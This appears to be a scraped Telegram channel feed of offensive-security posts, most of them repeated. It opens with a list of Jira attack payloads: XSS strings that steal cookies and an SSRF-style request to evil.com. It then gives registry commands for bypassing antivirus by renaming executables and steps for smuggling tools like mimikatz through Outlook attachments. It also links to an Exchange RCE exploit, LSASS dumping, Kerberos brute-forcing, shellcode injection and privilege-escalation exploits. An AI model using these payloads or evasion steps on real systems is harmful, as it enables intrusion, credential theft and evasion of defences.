Atlassian Jira Payloads
/secure/QueryComponent!Default.jspa
/secure/ViewUserHover.jspa
/ViewUserHover.jspa?username=Admin
/rest/api/2/dashboard?maxResults=100
/pages/%3CIFRAME%20SRC%3D%22javascript%3Aalert(‘XSS’)%22%3E.vm
/rest/api/2/user/picker?query=admin
/plugins/servlet/oauth/users/icon-uri?consumerUri=https://evil.com
/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=x2rnu%3Cscript%3Ealert(1)%3C%2fscript%3Et1nmk&Search=SearchConfigurePortalPages.jspa
/plugins/servlet/Wallboard/?dashboardId=10100&dashboardId=10101&cyclePeriod=(function(){alert(document.cookie);return%2030000;})()&transitionFx=none&random=true
/secure/ConfigurePortalPages!default.jspa?view=popular
/secure/ManageFilters.jspa?filterView=search&Search=Search&filterView=search&sortColumn=favcount&sortAscending=false
/secure/ContactAdministrators!default.jspa
#bugbounty #jira #payloadsGPUSleep
Small project of mine that is designed to move Cobalt Strike (or any really) beacon image, and heap, from memory to GPU memory before going to sleep. And moves everything back at the same place after sleep.
# https://github.com/oXis/GPUSleep
# https://oxis.github.io/GPUSleep/
#redteam #gpu #sleep #beacon
Small project of mine that is designed to move Cobalt Strike (or any really) beacon image, and heap, from memory to GPU memory before going to sleep. And moves everything back at the same place after sleep.
# https://github.com/oXis/GPUSleep
# https://oxis.github.io/GPUSleep/
#redteam #gpu #sleep #beacon
GitHub
GitHub - oXis/GPUSleep: Move CS beacon to GPU memory when sleeping
Move CS beacon to GPU memory when sleeping. Contribute to oXis/GPUSleep development by creating an account on GitHub.
Windows Privileges
https://speakerdeck.com/fr0gger/windows-privileges
#windows #privileges #cheatsheet
https://speakerdeck.com/fr0gger/windows-privileges
#windows #privileges #cheatsheet
Cloudmare
Cloudmare is a simple tool to find origin servers of websites protected by Cloudflare, Sucuri or Incapsula with a misconfiguration DNS.
https://github.com/MrH0wl/Cloudmare
#bugbounty #cloudflare #tracker #ip
Cloudmare is a simple tool to find origin servers of websites protected by Cloudflare, Sucuri or Incapsula with a misconfiguration DNS.
https://github.com/MrH0wl/Cloudmare
#bugbounty #cloudflare #tracker #ip
APT
Microsoft Exchange Deserialization RCE (CVE-2021–42321) https://peterjson.medium.com/some-notes-about-microsoft-exchange-deserialization-rce-cve-2021-42321-110d04e8852 #exchange #rce #cve #deserialization
Microsoft Exchange Server RCE (PoC)
This PoC just pop
https://gist.github.com/testanull/0188c1ae847f37a70fe536123d14f398
#exchange #rce #poc
This PoC just pop
mspaint.exe on the target, can be use to recognize the signature pattern of a successful attack eventhttps://gist.github.com/testanull/0188c1ae847f37a70fe536123d14f398
#exchange #rce #poc
Gist
PoC of CVE-2021-42321: pop mspaint.exe on the target
PoC of CVE-2021-42321: pop mspaint.exe on the target - CVE-2021-42321_poc.py
Bypass AV via Change Filenames/Extension
You need to change the files extension:
#av #evasion #extension #file
You need to change the files extension:
.eyb files as .exe .faq files as .dll
Use the following commands: reg add HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.eyb /f /ve /t REG_SZ /d exefileThis can also work on other security solutions and for many other blacklisted techniques.
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.eyb /f /v "Content Type" /t REG_SZ /d "application/x-msdownload"
#av #evasion #extension #file
This media is not supported in your browser
VIEW IN TELEGRAM
DumpNParse
DumpNParse is a tool that will automatically dump LSASS and parse the results.
https://github.com/icyguider/DumpNParse
#lsass #dump #parse
DumpNParse is a tool that will automatically dump LSASS and parse the results.
https://github.com/icyguider/DumpNParse
#lsass #dump #parse
InfoSec BlackFriday Offers
- Books
- Courses
- Services
- Software
- Hardware
https://github.com/0x90n/InfoSec-Black-Friday
#BlackFriday #InfoSec
- Books
- Courses
- Services
- Software
- Hardware
https://github.com/0x90n/InfoSec-Black-Friday
#BlackFriday #InfoSec
Picky PPID Spoofing
Parent Process ID (PPID) Spoofing is one of the techniques employed by malware authors to blend in the target system. This is done by making the malicious process look like it was spawned by another process. This helps evade detections that are based on anomalous parent-child process relationships.
https://capt-meelo.github.io//redteam/maldev/2021/11/22/picky-ppid-spoofing.html
#pid #spoofing #redteam #maldev #malware
Parent Process ID (PPID) Spoofing is one of the techniques employed by malware authors to blend in the target system. This is done by making the malicious process look like it was spawned by another process. This helps evade detections that are based on anomalous parent-child process relationships.
https://capt-meelo.github.io//redteam/maldev/2021/11/22/picky-ppid-spoofing.html
#pid #spoofing #redteam #maldev #malware
Hack.Learn.Share
Picky PPID Spoofing
Performing PPID Spoofing by targeting a parent process with a specific integrity level.
Clipboard Shellcode Injection
https://gist.github.com/leftp/d89ddc4651a828333d9c0ca5681d1fc8
#clipboard #shellcode #injection #redteam #maldev
https://gist.github.com/leftp/d89ddc4651a828333d9c0ca5681d1fc8
#clipboard #shellcode #injection #redteam #maldev
pyKerbrute
Use Python to quickly brute force and enumerate valid Active Directory accounts through Kerberos Pre-Authentication (supports Pass-the-Hash)
https://github.com/3gstudent/pyKerbrute
#ad #kerberos #spray
Use Python to quickly brute force and enumerate valid Active Directory accounts through Kerberos Pre-Authentication (supports Pass-the-Hash)
https://github.com/3gstudent/pyKerbrute
#ad #kerberos #spray
GitHub
GitHub - 3gstudent/pyKerbrute: Use python to perform Kerberos pre-auth bruteforcing
Use python to perform Kerberos pre-auth bruteforcing - 3gstudent/pyKerbrute
Outlook Attachments
Attackers can compose an email on Outlook (or O365) and attach a file and then use the file's download link to directly download the file. Restricted file types would first need to have their file extension modified (e.g. mimikatz.exe becomes mimikatz.exe.txt) and then upon download the file extension is modified back to the original extension.
#outlook #attachments #redteam #phishing
Attackers can compose an email on Outlook (or O365) and attach a file and then use the file's download link to directly download the file. Restricted file types would first need to have their file extension modified (e.g. mimikatz.exe becomes mimikatz.exe.txt) and then upon download the file extension is modified back to the original extension.
1. Compose an emailLink is valid for ~15 minutes.
2. Attach a file (add .txt to the end if it's a restricted file type)
3. Click on the file to download it and grab the link (attachment.outlook.live.net or attachment.office.net)
#outlook #attachments #redteam #phishing
CVE Trends
CVE Trends gathers crowdsourced intel about CVEs from Twitter's filtered stream API and combines it with data from NIST's NVD and GitHub APIs.
https://cvetrends.com
#cve #trends #monitor
CVE Trends gathers crowdsourced intel about CVEs from Twitter's filtered stream API and combines it with data from NIST's NVD and GitHub APIs.
https://cvetrends.com
#cve #trends #monitor
This media is not supported in your browser
VIEW IN TELEGRAM
4-ZERO-3
Tool to bypass 403/401. This script contain all the possible techniques to do the same.
https://github.com/Dheerajmadhukar/4-ZERO-3
#forbidden #bypass #bugbounty
Tool to bypass 403/401. This script contain all the possible techniques to do the same.
https://github.com/Dheerajmadhukar/4-ZERO-3
#forbidden #bypass #bugbounty
Hunting for Persistence in Linux
# https://pberba.github.io/security/2021/11/22/linux-threat-hunting-for-persistence-sysmon-auditd-webshell/
# https://pberba.github.io/security/2021/11/23/linux-threat-hunting-for-persistence-account-creation-manipulation/
#blueteam #redteam #DFIR #security
# https://pberba.github.io/security/2021/11/22/linux-threat-hunting-for-persistence-sysmon-auditd-webshell/
# https://pberba.github.io/security/2021/11/23/linux-threat-hunting-for-persistence-account-creation-manipulation/
#blueteam #redteam #DFIR #security
pepe berba
Hunting for Persistence in Linux (Part 1): Auditd, Sysmon, Osquery (and Webshells)
An introduction to monitoring and logging in linux to look for persistence.
👍1
EfsPotato
MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability
https://github.com/zcgonvh/EfsPotato
#potato #seImpersonateprivilege #lpe
MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability
https://github.com/zcgonvh/EfsPotato
#potato #seImpersonateprivilege #lpe
GitHub
GitHub - zcgonvh/EfsPotato: Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation…
Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability). - zcgonvh/EfsPotato
This media is not supported in your browser
VIEW IN TELEGRAM
CVE-2021-43267 — Linux TIPC (PoC)
An article on how to escalate privileges via the slab-buffer-overflow in the Transparent Inter-Process Communication (TIPC) module.
Reference:
https://haxx.in/posts/pwning-tipc/
PoC:
https://github.com/ohnonoyesyes/CVE-2021-43267
#poc #cve #linux #lpe
An article on how to escalate privileges via the slab-buffer-overflow in the Transparent Inter-Process Communication (TIPC) module.
Reference:
https://haxx.in/posts/pwning-tipc/
PoC:
https://github.com/ohnonoyesyes/CVE-2021-43267
#poc #cve #linux #lpe